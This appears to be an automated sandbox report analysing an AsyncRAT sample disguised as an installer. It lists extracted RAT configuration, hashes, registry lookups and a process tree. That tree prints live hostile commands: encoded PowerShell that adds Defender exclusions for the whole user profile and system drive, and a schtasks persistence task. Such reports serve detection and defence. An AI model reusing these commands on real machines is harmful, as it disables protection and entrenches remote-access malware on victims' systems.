Analysis
-
max time kernel
142s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-es -
resource tags
arch:x64arch:x86image:win10v2004-20250314-eslocale:es-esos:windows10-2004-x64systemwindows -
submitted
20/04/2025, 00:15
Behavioral task
behavioral1
Sample
Instaladores/evasor/extras/ejecutores/exe original/PEinstall.exe
Resource
win10v2004-20250410-es
Behavioral task
behavioral2
Sample
Instaladores/evasor/extras/ejecutores/inperfecto/PEInstaller.exe
Resource
win10v2004-20250314-es
Behavioral task
behavioral3
Sample
Instaladores/evasor/extras/ejecutores/inperfecto/installer.exe
Resource
win10v2004-20250410-es
Behavioral task
behavioral4
Sample
Instaladores/evasor/install.exe
Resource
win10v2004-20250314-es
Behavioral task
behavioral5
Sample
Instaladores/launcher.exe
Resource
win10v2004-20250314-es
General
-
Target
Instaladores/evasor/install.exe
-
Size
57KB
-
MD5
ea80d619808889ea8edb799056a67bc1
-
SHA1
de591d83c5e24498a294366205d0a12d2098385c
-
SHA256
2ebed6be66514b15e46f9b3afc93a20c9bbfb9aebba07128320b2e56c239e3d9
-
SHA512
d7e43ccd9a2f4f0d959d49ddc089a90da4e7e00cde0480c849d5078cf6127d5a15f4229067170399e6722a574b43f2121f9cbc8b34768b844583adacaff07929
-
SSDEEP
1536:KERi5rR21kXfc3dLnUAfUgc2vZnmHYUTmu1ycX9D:3RV6EpUgcTmu1ycX9D
Malware Config
Extracted
asyncrat
0.5.8
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
127.0.0.1:2009
jc1XWfeoz50P
-
delay
10
-
install
true
-
install_file
executor.exe
-
install_folder
%Temp%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral4/files/0x000b00000002415b-23.dat family_asyncrat -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation install.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation PEInstaller.exe -
Executes dropped EXE 2 IoCs
pid Process 1988 PEInstaller.exe 3992 executor.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language executor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PEInstaller.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5756 timeout.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4404 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 2112 powershell.exe 2112 powershell.exe 4752 powershell.exe 4752 powershell.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe 1988 PEInstaller.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2112 powershell.exe Token: SeDebugPrivilege 4752 powershell.exe Token: SeDebugPrivilege 1988 PEInstaller.exe Token: SeDebugPrivilege 3992 executor.exe Token: SeDebugPrivilege 3992 executor.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 5144 wrote to memory of 2112 5144 install.exe 84 PID 5144 wrote to memory of 2112 5144 install.exe 84 PID 5144 wrote to memory of 4752 5144 install.exe 93 PID 5144 wrote to memory of 4752 5144 install.exe 93 PID 5144 wrote to memory of 1988 5144 install.exe 95 PID 5144 wrote to memory of 1988 5144 install.exe 95 PID 5144 wrote to memory of 1988 5144 install.exe 95 PID 1988 wrote to memory of 4688 1988 PEInstaller.exe 99 PID 1988 wrote to memory of 4688 1988 PEInstaller.exe 99 PID 1988 wrote to memory of 4688 1988 PEInstaller.exe 99 PID 1988 wrote to memory of 3236 1988 PEInstaller.exe 101 PID 1988 wrote to memory of 3236 1988 PEInstaller.exe 101 PID 1988 wrote to memory of 3236 1988 PEInstaller.exe 101 PID 3236 wrote to memory of 5756 3236 cmd.exe 103 PID 3236 wrote to memory of 5756 3236 cmd.exe 103 PID 3236 wrote to memory of 5756 3236 cmd.exe 103 PID 4688 wrote to memory of 4404 4688 cmd.exe 104 PID 4688 wrote to memory of 4404 4688 cmd.exe 104 PID 4688 wrote to memory of 4404 4688 cmd.exe 104 PID 3236 wrote to memory of 3992 3236 cmd.exe 105 PID 3236 wrote to memory of 3992 3236 cmd.exe 105 PID 3236 wrote to memory of 3992 3236 cmd.exe 105
Processes
-
C:\Users\Admin\AppData\Local\Temp\Instaladores\evasor\install.exe"C:\Users\Admin\AppData\Local\Temp\Instaladores\evasor\install.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5144 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcgBmACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHgAYwBxACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVABoAGUAcgBlACAAdwBhAHMAIABhAG4AIABlAHIAcgBvAHIAIABlAHgAZQBjAHUAdABpAG4AZwAgAHQAaABpAHMAIABwAHIAbwBnAHIAYQBtAC4AIABDAG8AbgB0AGEAYwB0ACAAdABoAGUAIABhAHUAdABoAG8AcgAgAGYAbwByACAAbQBvAHIAZQAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgAuACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwB4AG0AYwAjAD4A"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbQBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAaQByACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAcQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAYQBzACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4752
-
-
C:\Users\Admin\AppData\Roaming\PEInstaller.exe"C:\Users\Admin\AppData\Roaming\PEInstaller.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "executor" /tr '"C:\Users\Admin\AppData\Local\Temp\executor.exe"' & exit3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "executor" /tr '"C:\Users\Admin\AppData\Local\Temp\executor.exe"'4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA529.tmp.bat""3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5756
-
-
C:\Users\Admin\AppData\Local\Temp\executor.exe"C:\Users\Admin\AppData\Local\Temp\executor.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
-
-
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
155B
MD5e0f8579242da67d4ce7b199219978b63
SHA14e838db4a5a73ee839e6a331e321bd4fdbec4a87
SHA25640450f73b80d1cd5cd9029e174cf47e3553d59c503dde6948f3431d461d3ab4f
SHA51289bb58f0b16aa2fd074edae0096cc2b891664ad2aaf3170a1d633e3bba370712d52957fb773ec77d829a614aa29aa19f4326581c460ed6a167cb5412c9245a7c
-
Filesize
48KB
MD5a96ef57452d73871dc1045b96fddcf96
SHA17a9b28306b0fc32d4281b756be5bc91f53234696
SHA2562fd4684b115a4b607493596b7fba4d54ddc7d97aec1852fbd60d449f353c2902
SHA51214db2977907baa98fe81f66fc0b44d360bee92d8b5e53527021fd9ef5f182e3aaa30e5e05ef95b0eac3d09b21074e89dee42c59d8a23b91a3dfa0c4871c3cd8e